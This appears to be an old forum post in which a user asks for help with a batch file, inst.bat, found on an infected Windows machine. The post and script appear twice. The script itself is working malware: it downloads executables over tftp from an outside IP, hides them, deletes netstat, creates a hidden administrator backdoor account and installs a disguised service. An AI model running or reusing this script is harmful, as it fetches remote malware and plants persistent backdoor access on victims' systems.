S
Sed Mayne
Hi all
During my paranoia over the MSBlaster invasion, I found a file called
"inst.bat" in my Windows\System32 directory. Its contents are listed
below (I added the "## "). It had obviously run because the exe files
in the tftp lines were also there. I deleted the exe files. Has anyone
seen this? What does it do and how can I undo it? Ever since I found
this my internet access has been slow (I think?)
Regards
Sed Mayne
## echo off
## echo created by iM
## echo versiob 1.0
##
## tftp -i 66.163.242.178 GET kaiten.exe
## tftp -i 66.163.242.178 GET serv.exe
## tftp -i 66.163.242.178 GET ats.exe
## tftp -i 66.163.242.178 GET srvss.exe
##
## mkdir %SystemRoot%\System32\dllcache
## attrib +a +h +s %SystemRoot%\System32\dllcache
##
## copy kaiten.exe %SystemRoot%\System32\dllcache\Explorer.exe
## echo copied.
## echo copying services
## copy serv.exe %SystemRoot%\System32\dllcache\serv.exe
## copy ats.exe %SystemRoot%\System32\dllcache\ats.exe
## copy srvss.exe %SystemRoot%\System32\dllcache\srvss.exe
## del %SystemRoot%\System32\netstat.exe
## echo now adding user sysadmin/pimp
## net user sysadmin /add
## net user sysadmin pimp
## net localgroup Administrators sysadmin /add
## cd %SystemRoot%\System32\dllcache
## set MXBIN=%SystemRoot%\System32\dllcache
## set MXHOME=%SystemRoot%\System32\dllcache
## serv.exe createsvrany "Explorer" "Windows GUI Manager"
## "%SystemRoot%\System32\dllcache\srvss.exe"
## "%SystemRoot%\System32\dllcache\Explorer.exe"
##
## net start Explorer
##
## echo Disconnecting from remote boxes..
## echo Process Finished. Hit any Key to exit.
During my paranoia over the MSBlaster invasion, I found a file called
"inst.bat" in my Windows\System32 directory. Its contents are listed
below (I added the "## "). It had obviously run because the exe files
in the tftp lines were also there. I deleted the exe files. Has anyone
seen this? What does it do and how can I undo it? Ever since I found
this my internet access has been slow (I think?)
Regards
Sed Mayne
## echo off
## echo created by iM
## echo versiob 1.0
##
## tftp -i 66.163.242.178 GET kaiten.exe
## tftp -i 66.163.242.178 GET serv.exe
## tftp -i 66.163.242.178 GET ats.exe
## tftp -i 66.163.242.178 GET srvss.exe
##
## mkdir %SystemRoot%\System32\dllcache
## attrib +a +h +s %SystemRoot%\System32\dllcache
##
## copy kaiten.exe %SystemRoot%\System32\dllcache\Explorer.exe
## echo copied.
## echo copying services
## copy serv.exe %SystemRoot%\System32\dllcache\serv.exe
## copy ats.exe %SystemRoot%\System32\dllcache\ats.exe
## copy srvss.exe %SystemRoot%\System32\dllcache\srvss.exe
## del %SystemRoot%\System32\netstat.exe
## echo now adding user sysadmin/pimp
## net user sysadmin /add
## net user sysadmin pimp
## net localgroup Administrators sysadmin /add
## cd %SystemRoot%\System32\dllcache
## set MXBIN=%SystemRoot%\System32\dllcache
## set MXHOME=%SystemRoot%\System32\dllcache
## serv.exe createsvrany "Explorer" "Windows GUI Manager"
## "%SystemRoot%\System32\dllcache\srvss.exe"
## "%SystemRoot%\System32\dllcache\Explorer.exe"
##
## net start Explorer
##
## echo Disconnecting from remote boxes..
## echo Process Finished. Hit any Key to exit.
